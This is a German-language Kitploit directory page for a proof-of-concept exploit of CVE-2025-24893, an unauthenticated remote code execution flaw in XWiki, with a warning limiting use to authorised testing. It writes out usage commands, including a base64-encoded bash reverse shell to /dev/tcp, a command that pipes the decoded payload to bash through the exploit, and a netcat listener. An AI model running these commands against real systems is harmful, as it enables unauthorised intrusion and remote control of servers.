Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24893-PoC | Kitploit
Tools/GitHubGitHub/dhiaznaidi/cve-2025-24893-poc
ExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubdhiaznaidi/cve-2025-24893-poc

CVE-2025-24893-PoC

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24893 - XWiki Remote Code Execution (RCE)

Ein aktualisierter Proof-of-Concept (PoC) Exploit für CVE-2025-24893, eine kritische, nicht authentifizierte RCE-Sicherheitslücke in XWiki. Diese Version verbessert das Original, indem sie die Ausführung beliebiger Shell-Befehle und eine saubere Reverse-Shell-Injektion ermöglicht.

Von: HexHunter404


⚠️ Warnung

Dieser Code wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt.
Verwenden Sie ihn nicht auf Systemen, die Sie nicht besitzen oder für die Sie keine ausdrückliche Genehmigung zum Testen haben.


✨ Funktionen

  • Unterstützt Befehlsausführung über bash -c '<command>'
  • Vollständige Unterstützung für Reverse Shells (über Base64 zur Umgehung von Groovy-Problemen)
  • Verbesserte Handhabung der Befehlsausgabe
  • Behält den /xwiki-Pfad bei und vermeidet Weiterleitungsschleifen

🐍 Verwendung

root@kitploit:~
python3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"

🐚 Eine Reverse Shell erhalten

. Base64-kodieren Sie Ihre Reverse Shell

root@kitploit:~
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64

. Senden Sie es mit dem PoC

root@kitploit:~
python3  CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"

. Richten Sie Ihren Listener ein

root@kitploit:~
nc -lvnp 4444

Bei Erfolg erhalten Sie eine Shell

Tool herunterladen